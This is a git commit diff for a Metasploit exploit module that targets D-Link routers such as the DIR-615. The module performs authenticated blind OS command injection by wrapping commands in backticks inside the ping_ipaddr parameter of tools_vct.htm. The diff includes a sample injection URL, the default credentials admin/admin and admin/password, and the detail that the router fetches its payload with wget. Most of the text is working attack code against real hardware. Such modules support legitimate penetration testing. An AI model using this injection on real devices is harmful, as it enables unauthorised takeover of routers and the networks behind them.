feeback included

unstable
m-1-k-3 2013-05-19 16:19:45 +02:00
parent 981cc891bc
commit 4816925f83
1 changed files with 3 additions and 4 deletions

View File

@ -22,7 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
Some D-Link Routers are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin or admin/password. Since
it is a blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. A ping command against a
executed command when using the cmd generic payload. This module was tested against
a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
controlled system could be used for testing purposes. The exploit uses the wget
client from the device to download the payload.
},
@ -77,17 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote
def request(cmd,user,pass)
#http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
cmd = Rex::Text.uri_encode(cmd)
begin
res = send_request_cgi({
'uri' => @uri,
'method' => 'GET',
'encode_params' => false,
'vars_get' => {
"page" => "tools_vct",
"hping" => "0",
"ping_ipaddr" => "1.1.1.1%60#{cmd}%60",
"ping_ipaddr" => "1.1.1.1`#{cmd}`",
"ping6_ipaddr" => ""
}
})